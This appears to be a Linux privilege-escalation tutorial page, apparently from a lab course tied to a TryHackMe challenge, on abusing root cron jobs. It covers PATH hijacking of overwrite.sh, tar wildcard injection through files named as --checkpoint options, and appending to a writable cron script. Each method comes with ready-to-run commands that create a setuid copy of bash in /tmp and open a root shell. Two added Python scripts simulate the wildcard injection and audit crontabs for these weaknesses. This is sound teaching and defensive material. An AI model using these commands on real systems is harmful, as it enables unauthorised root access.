# Cron Jobs

## What are Cron Jobs?

In Linux, scheduled tasks are called **cron jobs**. System-wide cron jobs are defined in `/etc/crontab` (the cron table). If we are able to write a malicious payload into a script that a cron job executes automatically (every minute, say), that payload runs with the privileges of the user the job is registered for, which for the entries in this page is root.

## Enumeration

Enumerate crontab:

```bash
cat /etc/crontab
```

For example:

![crontab](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWVjG_njKgBtvmnKaJh%2F-MfjVPVkpwh21revo-wC%2F-MfjXNJj8u33z7kqUa5J%2Fimage.png?alt=media\&token=d4207021-654a-42f3-b7e0-8bef7c932995)

Here the five asterisks mean "every minute, of every hour, of every day of the month, of every month, of every day of the week", so `overwrite.sh` and `/usr/local/bin/compress.sh` are executed every minute, as the user named in the sixth field (root).

If we don't have permission to read `/etc/crontab`, [pspy](https://github.com/DominicBreuker/pspy) can help us identify scheduled tasks as well, since it watches process creation rather than reading the crontab.

## Method 1: Cron Path

Recall the crontab:

![crontab](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWVjG_njKgBtvmnKaJh%2F-MfjeMbkfBkHXQwHADtK%2F-Mfje_o7IJ3Zy_tZNfNS%2Fimage.png?alt=media\&token=de7d6966-a676-4ec0-bf04-c03ba653d84c)

Note that `overwrite.sh` is invoked by bare filename (no directory component), so the shell looks it up through the `$PATH` that cron sets, which here is:

```
/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
```

If we create a malicious `overwrite.sh` in `/home/user`, the first directory in that `$PATH`, the lookup finds ours before the real script in `/usr/local/bin`, and the cronjob executes our script instead.

Create a malicious `overwrite.sh` in `/home/user`:

```bash
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
```

Don't forget to make it executable:

```bash
chmod +x /home/user/overwrite.sh
```

Wait a minute or so for the cronjob to run the script, then try getting a root shell (`-p` makes bash keep the effective uid that the setuid bit grants):

```bash
/tmp/bash -p
```

## Method 2: Cron Wildcard

Recall the crontab:

![crontab](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWVjG_njKgBtvmnKaJh%2F-MfjeMbkfBkHXQwHADtK%2F-MfjeeE2IycBJ4Jlc-EU%2Fimage.png?alt=media\&token=08ec53f7-37fc-4162-bac3-89746f9e1da6)

Examine the content of `/usr/local/bin/compress.sh`:

![/usr/local/bin/compress.sh](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWVjG_njKgBtvmnKaJh%2F-Mfjeguxb6w5PgWg04vZ%2F-MfjesLM-eLWOioYFYQ4%2Fimage.png?alt=media\&token=2840c3f7-1707-4125-8a60-0c8328f6096f)

Notice the wildcard (`*`) that the script passes to `tar`. The script intends to back up the `/home/user` directory, but the shell expands `*` into the names of the files in that directory, and `tar` parses any of those names that start with `-` as options. We can therefore store a privesc payload in `/home/user/runme.sh` and use `tar` wildcard injection to make the cronjob effectively execute the following command:

```bash
tar czf /tmp/backup.tar.gz --checkpoint=1 --checkpoint-action=exec=sh\ runme.sh
```

Create a privesc payload `/home/user/runme.sh`:

```bash
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
```

Make it executable:

```bash
chmod +x /home/user/runme.sh
```

Prepare the `tar` injection, part 1: create an empty file whose name is the `--checkpoint=1` option:

```bash
touch /home/user/--checkpoint=1
```

Prepare the `tar` injection, part 2: create an empty file whose name is the `--checkpoint-action` option (the space must be escaped so it stays part of one filename):

```bash
touch /home/user/--checkpoint-action=exec=sh\ runme.sh
```

Wait a minute or so for the cronjob to run `compress.sh`, then try getting a root shell:

```bash
/tmp/bash -p
```
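To see why the wildcard matters, here is an added example (not from the original page) in Python that reproduces the shell's `*` expansion on a constructed directory, shows which of the expanded words a getopt-style parser such as GNU tar's takes as options, and contrasts that with the same command written with a `--` terminator. The file names, the scratch directory and the `/tmp/backup.tar.gz` archive name are assumptions for the demo; the backup script is assumed to run `tar -czf /tmp/backup.tar.gz *` from inside `/home/user`, as the effective command above implies.

```python
import os
import shutil
import tempfile

# Constructed sample (an assumption for this demo, not taken from a real host):
# the names /home/user would contain after the steps in the text, plus two
# ordinary user files.
SAMPLE_FILES = [
    "notes.txt",
    "runme.sh",
    "--checkpoint=1",
    "--checkpoint-action=exec=sh runme.sh",
]

# The fixed part of the backup command; `-f` consumes the archive name, so only
# the words after this prefix come from the glob.
TAR_PREFIX = ["tar", "-czf", "/tmp/backup.tar.gz"]


def make_sample_dir():
    """Create a scratch directory holding the constructed sample files."""
    directory = tempfile.mkdtemp(prefix="cronwild-")
    for name in SAMPLE_FILES:
        with open(os.path.join(directory, name), "w") as fh:
            fh.write("sample content\n")
    return directory


def expand_wildcard(directory):
    """What the shell substitutes for a bare `*`: every non-hidden entry name in
    the directory, one argv word each, in sorted order (the shell sorts by the
    locale's collation; plain code-point order is used here)."""
    return sorted(n for n in os.listdir(directory) if not n.startswith("."))


def vulnerable_argv(directory):
    """argv of `tar -czf /tmp/backup.tar.gz *` run inside `directory`."""
    return TAR_PREFIX + expand_wildcard(directory)


def hardened_argv(directory):
    """argv of `tar -czf /tmp/backup.tar.gz -- *`: the `--` tells tar that every
    later word is a file operand, even when it starts with '-'."""
    return TAR_PREFIX + ["--"] + expand_wildcard(directory)


def injected_options(argv):
    """Words contributed by the glob that a getopt-style parser would treat as
    options: anything starting with '-' that appears before a bare `--`."""
    found = []
    for word in argv[len(TAR_PREFIX):]:
        if word == "--":
            break
        if word.startswith("-"):
            found.append(word)
    return found


def option_like_names(directory):
    """Audit check for a directory that a cron job globs: file names starting
    with '-' have no ordinary reason to exist there and are worth alerting on."""
    return [n for n in expand_wildcard(directory) if n.startswith("-")]


def demo():
    """Build the sample directory, run both invocations through the classifier,
    clean up, and return the results."""
    directory = make_sample_dir()
    try:
        return {
            "vulnerable": injected_options(vulnerable_argv(directory)),
            "hardened": injected_options(hardened_argv(directory)),
            "suspicious_names": option_like_names(directory),
        }
    finally:
        shutil.rmtree(directory)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On the defending side the fix is to never let a glob reach `tar`'s option parser: write `tar -czf /tmp/backup.tar.gz -- *`, or avoid the glob entirely with `tar -czf /tmp/backup.tar.gz -C /home/user .`. The `option_like_names` check is the detection counterpart: a file whose name starts with `-` inside a directory that a root cron job globs is an indicator worth alerting on.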

## Method 3: Cron File Overwrite

Recall the crontab:

![crontab](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWVjG_njKgBtvmnKaJh%2F-Mfjl1ynTG80o6iSk-Xz%2F-MfjlRpZbA_IbrOoNdPF%2Fimage.png?alt=media\&token=0b8bc393-84e5-4e70-8b8e-e7371d62051c)

Examine its permission:

![Permission](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWVjG_njKgBtvmnKaJh%2F-MfjlpNBgudGt5VuLId3%2F-Mfjm4-s-f29NqySjjbh%2Fimage.png?alt=media\&token=1150eec0-d278-4f8c-bc29-ff02f3fda882)

Since this script is owned by root, is executable, and is run by the cronjob as root, the only thing that matters is whether our user can write to it; the permission listing above shows that we can. We can therefore simply append a privesc payload (or reverse shell payload) to the file and wait for the cronjob to execute it.

Append a privesc payload to `/usr/local/bin/overwrite.sh` (appending rather than overwriting keeps the original script working, so the cronjob does not break):

```bash
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh
```

Wait a minute or so for the cronjob to run `overwrite.sh`, then try getting a root shell:

```bash
/tmp/bash -p
```
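The enumeration step, Method 1 and Method 3 all come down to the same audit questions: for every job in the system crontab, which file will actually run, does the `PATH` lookup pass through a directory a non-root user can write, and can a non-root user write the file itself? The following Python script is an added example (not from the original page or from any tool it mentions) that parses crontab text and answers those questions with `stat()`. Its `demo()` runs the audit on a constructed temporary tree that mirrors the page's layout (a user-writable `home/user` first in `PATH`, scripts in `usr/local/bin`); the paths, modes and crontab lines in that tree are assumptions, since the permissions on a real host are not known here.

```python
import os
import shutil
import stat
import tempfile


def writable_by_untrusted(path, trusted_uids=(0,)):
    """True if someone outside trusted_uids could modify `path`: it is owned by
    an untrusted uid, is world-writable, or is group-writable by a non-root group."""
    st = os.stat(path)
    if st.st_uid not in trusted_uids or st.st_mode & stat.S_IWOTH:
        return True
    return bool(st.st_mode & stat.S_IWGRP) and st.st_gid != 0


def parse_crontab(text):
    """Parse system-crontab text (/etc/crontab or a file in /etc/cron.d).
    Returns the variable assignments (SHELL, PATH, ...) and the five-field jobs."""
    env, jobs = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split(None, 1)[0]:           # NAME=value line
            key, _, value = line.partition("=")
            env[key.strip()] = value.strip().strip('"')
            continue
        parts = line.split(None, 6)                 # min hr dom mon dow user command
        if len(parts) == 7:
            jobs.append({"schedule": " ".join(parts[:5]),
                         "user": parts[5], "command": parts[6]})
    return env, jobs


def resolve(word, path_dirs):
    """Find the file the job's shell would execute for `word`, plus the PATH
    directories it searched before finding it. A word containing '/' is used
    as-is; a bare name is searched through PATH in order, as execvp() does."""
    if "/" in word:
        return (word if os.path.isfile(word) else None), []
    searched = []
    for directory in path_dirs:
        candidate = os.path.join(directory, word)
        if os.path.isfile(candidate):
            return candidate, searched
        searched.append(directory)
    return None, searched


def audit(text, trusted_uids=(0,)):
    """Return (kind, command, path) findings per job: 'path-hijack' when the PATH
    lookup passes through an untrusted-writable directory before (or without)
    finding the command, 'writable-script' when the resolved file is writable."""
    env, jobs = parse_crontab(text)
    path_dirs = env.get("PATH", "/usr/bin:/bin").split(":")  # cron's default PATH
    findings = []
    for job in jobs:
        word = job["command"].split()[0]
        target, searched = resolve(word, path_dirs)
        for directory in searched:
            if os.path.isdir(directory) and writable_by_untrusted(directory, trusted_uids):
                findings.append(("path-hijack", job["command"], directory))
        if target is not None and writable_by_untrusted(target, trusted_uids):
            findings.append(("writable-script", job["command"], target))
    return findings


def demo():
    """Run the audit on a constructed temporary tree mirroring the page's layout:
    a user-writable home directory first in PATH, a bin directory holding a
    properly protected overwrite.sh and a world-writable compress.sh."""
    root = tempfile.mkdtemp(prefix="cronaudit-")
    try:
        home = os.path.join(root, "home", "user")
        bindir = os.path.join(root, "usr", "local", "bin")
        os.makedirs(home)
        os.makedirs(bindir)
        os.chmod(home, 0o777)      # stands in for "owned by the unprivileged user"
        os.chmod(bindir, 0o755)
        for name, mode in (("overwrite.sh", 0o755), ("compress.sh", 0o777)):
            script = os.path.join(bindir, name)
            with open(script, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(script, mode)
        crontab = (
            "SHELL=/bin/sh\n"
            f"PATH={home}:{bindir}\n"
            "* * * * * root overwrite.sh\n"
            f"* * * * * root {bindir}/compress.sh\n"
        )
        # The scratch tree is owned by whoever runs this, so that uid counts as
        # trusted here; a real audit keeps the default trusted_uids=(0,).
        return audit(crontab, trusted_uids=(0, os.getuid()))
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for kind, command, path in demo():
        print(f"{kind:16} {command!r} -> {path}")
```

To audit a real host, run `audit(open("/etc/crontab").read())` (and the same over each file in `/etc/cron.d`), ideally as root so every path can be inspected. The mitigations that silence the findings are the usual ones: absolute paths in crontab entries, a cron `PATH` made only of root-owned directories, and cron scripts that are root-owned and mode 0755.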

## Challenge: TryHackMe - CMesS

{% embed url="https://www.ctfwriteup.com/tryhackme/tcm-linux-privesc-course/cmess-medium" %}
TryHackMe - CMesS
{% endembed %}
